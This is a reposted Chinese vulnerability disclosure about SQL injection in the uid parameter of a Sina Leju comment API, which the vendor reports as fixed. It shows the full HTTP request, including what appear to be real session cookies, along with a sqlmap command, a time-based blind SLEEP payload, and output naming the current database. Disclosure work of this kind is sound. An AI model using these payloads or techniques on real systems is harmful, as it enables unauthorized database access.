神刀安全网

漏洞标题: 新浪乐居某接口存在SQL注入

漏洞详情

披露状态:

2016-04-23: 细节已通知厂商并且等待厂商处理中
2016-04-24: 厂商已经确认,细节仅向厂商公开
2016-04-25: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

SQL注入

详细说明:

注入参数 uid

code 区域
GET /api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011* HTTP/1.1
Host: comment.leju.com
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6
Accept-Encoding: gzip, deflate, sdch
Host: comment.leju.com
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.86 Safari/537.36
Connection: keep-alive
Referer: http://hf.leju.com/news/2016-04-22/08186129070685173370162.shtml
Cookie: M_AUTH=bcf97a064686696b03c5be538b6759fe74a9086b; M_USER=eNpdj8GKAjEMhp%2BmXoQl7bRNcuhhdAoWtlWnncOcZGbcZXEfYNGn3ypeFAL%2FT%2FKFP1nF0xA6pxjBoAYpV7WRfZ%2Fa6J3wKFiLloS3gkhs8IU77PbJu2p8bMPn3eQxl1AX4QMkKcUAa6kNEUgGU%2Bchl13oOzfe%2BstYjtd4%2B0lDAR4vv9f4J5qu1gPL%2B6Hfeoeap7mZLdlGWQJr4YxoiSUa%2BUVSPdhNSJ1b9DJp1dAEM1dRcF4WAzzZbzSkeb4fF1L7%2Fmp5Bql%2F1hZEWg%3D%3D; M_KEY=YmNhNzljMjFZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0T0Rnek1EVT0yZGY4; M_INFO=%7B%22uid%22%3A%222970574011%22%2C%22username%22%3A%22%5Cu7528%5Cu62372970574011%22%2C%22isThird%22%3Atrue%2C%22phone%22%3A%22%22%2C%22headurl%22%3A%22http%3A%5C%2F%5C%2Fp4.sinaimg.cn%5C%2F2970574011%5C%2F180%22%2C%22iscard%22%3Afalse%7D; M_UID=2970574011; M_ITSOURCE=749ab3b68632680660d776891751e812; M_SPRING=YzRjYTQyMzhNUT09YjkyMw%3D%3D; M_TICKET=NGU5ZDc4Y2RZbW91WW1KekxtaHZkWE5sTG5OcGJtRXVZMjl0TG1OdVh6RTBOVGc0TURFNU1EVmZNamszTURVM05EQXhNUT09ZWE5Yw%3D%3D; pgv_pvi=1220687872; city=wh; wapparam=wap2web; citypub=wh; extern_host=hf.leju.com; gatheruuid=56f63df72a5ab810

漏洞证明:

code 区域
sqlmap -r 1.txt --dbms=mysql --current-db --technique=T

漏洞标题:  新浪乐居某接口存在SQL注入

code 区域
---
Parameter: #1* (URI)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: http://comment.leju.com:80/api/comment/getcomment?callback=jsonp_278cgunw7w6imyb&key=1dd7374509225e5abf1484a8d0965aef&unique_id=6129070685173370162&uid=2970574011') AND (SELECT * FROM (SELECT(SLEEP(5)))sslJ) AND ('lITm'='lITm
---
[22:49:28] [INFO] testing MySQL
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[22:49:57] [INFO] confirming MySQL
[22:49:57] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[22:50:37] [INFO] adjusting time delay to 4 seconds due to good response times
[22:50:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.0
[22:50:37] [INFO] fetching current database
[22:50:37] [INFO] retrieved: comment_leju_com
current database: 'comment_leju_com'
[23:09:23] [INFO] fetched data logged to text files under '/Users/null0z/.sqlmap/output/comment.leju.com'

修复方案:

~~~

版权声明:转载请注明来源 null_z@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: 新浪乐居某接口存在SQL注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址